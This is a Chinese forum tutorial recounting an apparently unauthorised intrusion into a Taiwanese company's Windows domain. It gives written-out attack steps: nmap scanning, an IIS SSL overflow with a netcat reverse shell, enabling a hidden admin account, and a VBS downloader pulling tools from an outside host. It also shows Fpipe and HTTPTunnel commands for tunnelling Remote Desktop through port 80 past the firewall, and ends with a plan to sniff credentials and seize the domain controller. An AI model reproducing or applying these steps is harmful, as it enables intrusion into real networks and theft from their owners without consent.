[教程]对内网有端口转发的域的渗透

2012/3/7 17:32:00  人气 955    计算机网络论坛  
现在管理员的安全意识越来越高,值得庆祝,可惜大多是国外和TW的,国内倒没见几个管理员能配置出很BT的服务器,本文就是针对的一系列服务器配置情况(按我自己的理解),配置算比较BT的,一起来看看我们如何入侵它吧!
预想配置:
A. 配置防火墙。
B. 做Port过滤。
C. 禁止非过滤端口访问网络。
D. 远程管理限定IP。
E. 等等等等,暂时没有想到的适应此方法的配置,欢迎大家看完本文后补充。
本文作为例子的这台服务器的配置可能有些特殊,上面的配置是我自己根据进入的机器,查看其环境来说的,不对之处请大家指出,下面正式开始艰难地Attack之路。
先用NMAP看看服务器情况:
C:\>nmap -sS -P0 xxx.xxx.xxx.xxx

Starting nmap 3.50 ( http://www.insecure.org/nmap ) at 2004-05-31 19:41 中国标准时间
Interesting ports on xx-xx-xx-xx.HINET-IP.hinet.net (xxx.xxx.xxx.xxx):
(The 1653 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
110/tcp open pop3
443/tcp open https
3389/tcp open ms-term-serv

Nmap run completed -- 1 IP address (1 host up) scanned in 83.560 seconds
扫描出xxx.xxx.xxx.xxx此服务器有IIS SSL远程溢出漏洞,利用SSL EXP远程溢出成功后得到里边的网络环境,通过“ipconfig /all”可以发现Host Name是“lsiiwww”,具体情况请看下表(经过删减):
C:\WINNT\system32>ipconfig /all
ipconfig /all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : lsiiwww
Primary DNS Suffix . . . . . . . : lucybelle
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : lucybelle.
com
Ethernet adapter 跋办硈絬 2:
Physical Address. . . . . . . . . : 00-E0-7D-F8-23-0F
IP Address. . . . . . . . . . . . : 192.168.1.81
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . :
Ethernet adapter 跋办硈絬:
Physical Address. . . . . . . . . : 00-01-29-60-21-EC
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.0.81
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
DNS Servers . . . . . . . . . . . : 192.168.0.80
然后看看网络情况“Tracert www.hinet.net”:
C:\WINNT\system32>tracert www.hinet.net
tracert www.hinet.net
Tracing route to www.hinet.net *61.219.38.89*
over a maximum of 30 hops:
1 <10 ms <10 ms <10 ms 192.168.0.1
2 <10 ms <10 ms <10 ms 61.219.91.177
3 47 ms 47 ms 47 ms 10.219.9.254
4 47 ms 47 ms 47 ms ty-fo-c6r1.router.hinet.net *168.95.94.194*
5 47 ms 47 ms 47 ms ty-fo-c12r2.router.hinet.net *211.22.39.130*
6 47 ms 47 ms 47 ms tp-s2-c12r2.router.hinet.net *210.65.200.234*
7 47 ms 47 ms 46 ms tp-s2-c6r9.router.hinet.net *211.22.35.129*
8 47 ms 47 ms 47 ms 61-219-38-89.hinet-ip.hinet.net *61.219.38.89*
Trace complete.
可以看出是通过网关出去的,但也可能本机有公网IP。看本机服务开了3389,本来以为此次渗透就结束了,因为有了Termianl服务可以利用远程终端连接过去就可以得到GUI界面剩下的事情就简单了,但接着我用终端连接上去,居然出现的是 XP的登陆界面,如图1所示。


图1
IP地址输入错误?不对,查看SSL反向连接过来的IP地址:
C:\>nc -vv -l -p 80
listening on *any* 80 ...
connect to *192.168.4.100* from xxx.xxx.xxx.xxx.hinet.net *xxx.xxx.xxx.xxx* 6
1041
Microsoft Windows 2000 *セ 5.00.2195*
(C) Copyright 1985-2000 Microsoft Corp.
IP没错啊!仔细想想原因……
根据XP登陆界面可以初步判断此服务器位于一个域内,这就好办了,我先在进入的那台服务器上激活一个帐户,然后利用这个帐户登陆这台XP的机器,因为是域所以有了一台机器的一个域用户的密码,即可以用这个域用户登陆这台机器所在的域所有的机器!试下去!
激活TsInsternetUser帐户,然后添加它到Administrators组,试着用TsInternetUser 用户登陆XP结果失败,被进入的机器不是域控制器。用“net user /domain”命令看这台机器的用户,就大致确定这台机器不是一个域控制器了。
C:\WINNT\system32>net user /domain
net user /domain
硂兜璶―穦呼办 lucybelle.com.tw 呼办北矪瞶
\\lsiiweb.lucybelle.com.tw ㄏノ眀め
--------------------------------------------------------------------
Administrator amanda ann
cctim coral gigi
Guest IUSR_LSIIWEB IWAM_LSIIWEB
jan kaka katy
krbtgt long macy
mine peggy roger
stella tiffany tseng
TsInternetUser tsuenyu vivianhsieh
wu wukl yunyun
磅︽Ч拨祇ネ┪岿粇
既然无法登陆,那就先看看本地机器有没有管理员登陆,如果有人登陆,利用几个小工具把他的密码Dump出来就可以登陆XP的机器了。于是在目标机器上写入一个Down.vbs,Down.vbs的使用方法是“c:>cscript down.vbs http://www.hacker.com.cn/hacker.exe hacker.exe”,意思就是主动去下载www.hacker.com.cn上的Hacker.exe文件,然后放到本地,名字依然是Hacker.exe,这个方法防火墙很少挡连,因为出去的是80端口。利用这个VBS下载Findpass和Pulist工具,以后的下载也是利用此VBS。执行Pulist结果居然发现没有用户登陆,看来这条路走不通了。
终端连接xxx.xxx.xxx.xxx机器,结果却是XP的终端,但是我进入的却是Windows 2000*192.168.1.81*的机器,在Windows 2000机器上查找主页文件,其WEB目录在D:\web 下,证明了我心中的猜想:可能是做了端口映射,XP机器的80和443端口直接映射到 Windows2000机器的80和443端口。我的访问就是这样的过程了:
Me ? xxx.xxx.xxx.xxx *xp os* -> XP port map -> windows 2000 80 port
根据NMAP扫描端口的结果,此服务器还开了21,25,110,3389等端口,但是在Windows2000机器上没有开放25,110端口,所以我猜测是XP机器自己就开了Mail服务或者映射到别的内网机器上去了!
现在我给他来招毒的:利用Fpipe重定向端口,在Windows2000机器上执行如下命令:
fpipe -l 80 -s 53 -r 3389 192.168.1.81
意思是将发到本机80端口的连接通过53端口连接到192.168.1.81的3389端口,如果成功我可以连接这个IP的80端口,然后Fpipe把连接转向到本地端口3389!想法不错,可是执行Fpipe的结果直接导致了IIS挂掉,利用SSL EXP获得的Shell也挂掉了,再次溢出的时候提示无法连接到443端口,仰天大哭!后来在实践中发现可以利用Fpipe来端口重定向,但必须要先停止那个80端口,吃一亏长一智了。
第二天管理员重新启动了机器,我才有机会重新利用EXP进去,幻想管理员登陆在上边,我好直接Dump其密码,结果是白日做梦,管理员根本不在。难道没有别的方法来进入这台机器么?在我第一天把机器的IIS搞当后,整整一夜我都在想该如何才可以完全控制这台机器,后来还真被我想到了一点:用Httptunnel!

TIPS:什么是HTTPTunnel?
通常HTTPTunnel被称之为HTTP暗道,它的原理就是将数据伪装成HTTP的数据形式来穿过防火墙,实际上是在HTTP请求中创建了一个双向的虚拟数据连接来穿透防火墙,HTTPTunnel的优点就在于即使他的机器以前80端口开着,现在这么用也不会出现什么问题,正常的WEB访问仍然走老路子,重定向的隧道服务也畅通无阻。

利用Httptunnel把本地9898端口定向到远程主机80端口:
htc -F 9898 xxx.xxx.xxx.xxx:80
把目标机器的80端口定向到本地主机的3389端口:
hts -F localhost:3389 80
再用3389终端连接目标机器,理论上是这样的传输流程:
Local 3389 mstsc->localhost 9898(Httptunnel)map->server xxx.xxx.xxx.xxx 80 map->windows 2000 80(Httptunnel)map->windows 2000 3389
事实证明,利用Httptunnel是成功的:在本地执行Httptunnel客户端:
C:\>htc -F 9898 xxx.xxx.xxx.xxx:80
目标机器执行Httptunnel服务端:
C:\WINNT\system32>hts -F localhost:3389 80
hts -F localhost:3389 80
本地利用终端程序连接本地IP:9898,如图2所示。


图2
连接上去了,2000机器终端应该是这样的嘛。走到这一步,此次渗透就结束了,因为得到了一台机器的GUI权限,以后的操作相对简单:
A. 利用这台机器作为据点,扫描其内网其他机器,找出其域控制器。
B. 在此台机器安装Sniffer监听。
C. 获取其某个域用户帐户密码。
D. 攻破域控制器。
E. 所有的机器被告被控制,此次渗透结束。
大体上来讲,这次入侵是比较曲折的,虽然很简单就溢出了,但是控制整个内网却是比较麻烦的事,特别是几次端口转发更是弄得湖里糊涂,很容易把思路混淆,所以这里给广大喜欢安全的朋友们讲一声:“在入侵前请先问自己:我的目标是什么?我要怎么拿到?!”确定了目标,一切庞杂的东西都将不再成为我们的阻碍,一切都简单了。

. 有事请联系本人!

发表回复

   


  通知楼主

沙发

新会员182501.03-07 17:41
支持你!

回复只看TA